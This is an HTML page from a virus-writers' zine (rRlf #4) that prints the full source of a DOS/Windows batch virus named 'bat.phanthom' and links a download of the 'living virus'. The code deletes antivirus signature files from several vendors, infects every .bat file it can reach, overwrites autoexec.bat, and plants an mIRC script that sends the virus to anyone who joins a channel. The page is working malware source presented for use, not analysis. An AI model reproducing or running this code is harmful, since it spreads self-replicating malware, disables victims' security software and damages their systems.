<html>
<head>
<title>rRlf #4</title>
</head>
<body text="#ffffff" link="#ff0f0f" vlink="#ff0f0f" alink="#ff0f0f" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>Redemption</i>
<br><table cellpadding="9">
<tr>
<th><a href="rRlf.18.html">Last article</a></th>
<th><a href="rRlf.01.html">Table of contents</a></th>
<th><a href="rRlf.20.html">Next article</a></th>
</tr>
</table>
</center>
<p><b><u>bat.phanthom by adious</u></b>
<p><pre>
@echo off | REM phanthom
ctty nul.phanthom
cls | phanthom
REM bat.phanthom
REM by adious phanthom
if exist c:\phanthom.bat goto endvir
copy %0 c:\phanthom.bat
attrib +r +s c:\phanthom.bat
set phanthom=del
if exist c:\phanthom.bat %phanthom% c:\programme\norton~1\s32integ.dll
if exist c:\phanthom.bat %phanthom% c:\programme\f-prot95\fpwm32.dll
if exist c:\phanthom.bat %phanthom% c:\programme\mcafee\scan.dat
if exist c:\phanthom.bat %phanthom% c:\tbavw95\tbscan.sig
if exist c:\phanthom.bat %phanthom% c:\tbav\tbav.dat 
if exist c:\phanthom.bat %phanthom% c:\programme\tbav\tbav.dat 
if exist c:\phanthom.bat %phanthom% c:\programme\avpersonal\antivir.vdf 
for %%phanthom in (*.bat) do copy %0 + %%phanthom
set phanthom=cd
cd c:\windows
set phanthom=%0
for %%phanthom in (*.bat) do copy %phanthom% + %%phanthom
set phanthom=cd\
%phanthom%
set phanthom=del
%phanthom% c:\autoexec.bat
set phanthom=echo
%phanthom% @echo off >c:\autoexec.bat
%phanthom% @cls >>c:\autoexec.bat
%phanthom% echo 000000000000000 >>c:\autoexec.bat
%phanthom% echo  "the phanthom has came to hunt the living" >>c:\autoexec.bat
%phanthom% echo. >>c:\autoexec.bat
%phanthom% echo bat.phanthom >>c:\autoexec.bat
%phanthom% echo another creation form the labs of adious [rRlf] >>c:\autoexec.bat
%phanthom% echo 000000000000000 >>c:\autoexec.bat
%pahnthom% pause >>c:\autoexec.bat
:phanthom  mirc script
%phanthom% [script]>3.bat 
%phanthom% n0=on 1:JOIN:#:{ >>3.bat 
%phanthom% n1= /if ( nick == $me ) { halt } >>3.bat 
%phanthom% n2= /.dcc send $nick c:\phanthom.bat >>3.bat 
%phanthom% n3=} >>3.bat 
set phanthom=copy
if exist c:\mirc\mirc.ini %phanthom% 3.bat c:\mirc\script.ini 
if exist c:\mirc32\mirc.ini %phanthom% 3.bat c:\mirc32\script.ini 
if exist c:\progra~1\mirc\mirc.ini %phanthom% 3.bat c:\progra~1\mirc\script.ini 
if exist c:\progra~1\mirc32\mirc.ini %phanthom% 3.bat c:\progra~1\mirc32\script.ini 
set phanthom=del
%phanthom% 3.bat
:phanthom end
</pre>
<p><a href="rRlf.19.zip">living virus</a>
</body>
</html>
